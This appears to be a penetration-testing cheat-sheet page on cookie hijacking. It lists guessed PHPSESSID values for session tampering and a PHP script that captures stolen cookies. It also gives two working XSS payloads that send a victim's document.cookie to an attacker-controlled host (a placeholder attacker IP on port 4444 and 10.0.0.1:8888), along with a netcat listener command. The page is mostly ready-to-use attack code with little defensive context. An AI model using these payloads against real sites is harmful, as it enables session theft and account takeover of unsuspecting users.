Cookie Hijacking
Last modified: 2023-04-21
Cookie
Web
A methodology of manipulating, grabbing cookies.
Cookie Manipulation
Cookie: PHPSESSID=0
Cookie: PHPSESSID=1
Cookie: PHPSESSID=999
<!-- ASCII Hex -->
Cookie: PHPSESSID=3836382d61646d696e
PHP Cookie Grabbing with XSS
In your local machine, create the payload for grabbing the cookie when the other user will access your machine.
// steal_cookie.php
<?php echo $_GET['cookie']; ?>
Create the JavaScript code to force users to access your machine which shows the victim's cookie value.
<script>document.location = 'http://<attacker-ip>:4444/steal_cookie.php?cookie='+document.cookie</script>
POST request with this JavaScript code to the target web page.
Open listner in your local machine and wait for the other users will access the target web page.
nc -lvnp 4444
Python Cookie Stealer with XSS
This script is useful to steal Cookie.
To start web server, execute the Python script as below.
python2 XSS-cookie-stealer.py
Then inject our XSS to steal Cookie via our web server.
For instance,
<img src=x onerror=this.src='http://10.0.0.1:8888/?'+document.cookie;>